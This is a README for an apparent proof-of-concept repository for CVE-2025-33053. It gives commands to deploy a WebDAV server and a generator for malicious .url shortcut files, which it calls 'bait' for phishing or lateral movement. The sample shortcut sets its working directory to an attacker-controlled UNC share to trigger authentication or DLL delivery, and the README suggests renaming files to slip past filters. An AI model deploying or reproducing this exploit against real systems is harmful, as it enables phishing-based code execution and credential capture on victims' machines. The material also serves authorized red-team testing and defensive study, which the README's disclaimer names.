
CVE-2025-33053 Proof Of Concept (PoC)
This repository provides scripts to automatically deploy a WebDAV server on Ubuntu using Apache2, and generate malicious .url shortcut files for use in phishing, red teaming, or lateral movement simulation.
setup_webdav.sh – Bash script to configure Apache2 + WebDAV.setup_webdav.py – Python version of the above.gen_url.py – Python script to generate .url shortcut files with UNC/WebDAV paths.README.md – Documentation.sudo)sudo bash setup_webdav.sh
Or using Python:
sudo python3 setup_webdav.py
By default, the script will:
/var/www/webdav.DAV and DAV_FS modules.DavLockDB directory (to prevent Apache DAV locking errors).📎 WebDAV path:
http://<your-ip>/webdav/
.url Shortcutpython3 gen_url.py --ip 192.168.1.100 --out doc.url
python3 gen_url.py \
--ip 《YOUR IP ADDRESS》\
--share 《YOUR SHARE NAME》(Default: webdav) \
--out 《YOUR OUTPUT FILENAME.url》(Default: bait.url) \
--exe "C:\Program Files\Internet Explorer\iediagcmd.exe" \
--icon "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" \
--index 13 \
--modified 20F06BA06D07BD014D
This will create a .url file like:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\192.168.1.100\webdav\
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
📌 Clicking this file (in certain configurations) may cause the target system to auto-connect to your WebDAV server (authentication or DLL delivery).
sudo ufw allow 80
.url files may not execute as expected depending on:
.url to .txt to bypass filters.This repository is for educational and authorized penetration testing only.
Do not use these scripts against systems you do not own or have permission to test.
For questions or ethical red teaming requests, reach out via GitHub issues.